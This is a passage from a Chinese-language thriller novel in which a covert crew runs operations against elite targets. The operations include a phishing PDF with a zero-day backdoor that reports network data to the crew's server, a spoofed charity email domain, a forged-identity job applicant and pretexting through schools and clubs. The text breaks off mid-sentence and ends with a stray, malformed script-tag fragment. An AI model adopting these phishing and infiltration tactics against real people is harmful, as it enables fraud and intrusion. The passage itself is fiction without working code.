这份PDF文件经过了特殊处理,携带了一个极其隐蔽的“零日漏洞”利用代码。该漏洞由素察团队发现并武器化,能够在不触发大多数杀毒软件警报的情况下,在目标打开文件时,悄然安装一个轻量级的后门程序。这个后门不会窃取核心数据,但会定期将目标电脑的MAC地址、网络连接信息以及一些基本的文件目录列表发送到“夜莺”控制的服务器。如果阿曼达·布莱克伍德是在家庭网络中打开这份文件,那么后门甚至可能渗透到与她丈夫共享的NAS(网络附加存储)或其他联网设备。
“邮件已发送,使用基金会真实域名的高仿邮箱,”“百灵”汇报,“情感切入点准确,预计目标打开附件的概率超过80%。”
“夜莺”轻轻摇晃着手中未沾唇的水晶杯,目光幽深。她知道,对于这些生活在镀金泡泡里的精英而言,来自慈善机构的“认可”和“邀请”,往往比来自商业伙伴的邮件更具诱惑力,也更容易放松警惕。
操作在继续。另一位成员,代号“杜鹃”,擅长伪造身份,进行长期潜伏。他正在利用精心伪造的简历和背景,尝试通过层层筛选,应聘目标C——一位着名对冲基金创始人的家族办公室私人助理职位。他的简历无懈可击,推荐人来自“夜莺”控制的、看似真实存在的海外公司,面试回答天衣无缝。即使不能成功入职,这个过程本身也能获取关于该家族办公室招聘流程、内部结构乃至一些未公开的偏好等宝贵信息。
还有成员在针对目标子女就读的精英学校,伪装成校友会工作人员或潜在捐赠者,试图从侧面搭建沟通渠道;有人在分析目标频繁光顾的高级俱乐部或度假村,寻找可能被收买或利用的服务人员……
每一个电话,每一封邮件,每一次“偶然”的邂逅,都是一支精心编排的舞步。没有刀光剑影,没有数据风暴,只有温和的语调、精心设计的说辞和对人性弱点的精准拿捏。
“夜莺”本人,则专注于更具挑战性的目标。她选中了一位与多个政治家族关系密切、经营着一家顶级游说公司的关键人物,埃莉诺·范肖。“守夜人”发现,这位范肖女士虽然表面光鲜,但其早年一段不为人知
/script src="https://m.ynfzff.com/17mb/scripts/test1.js">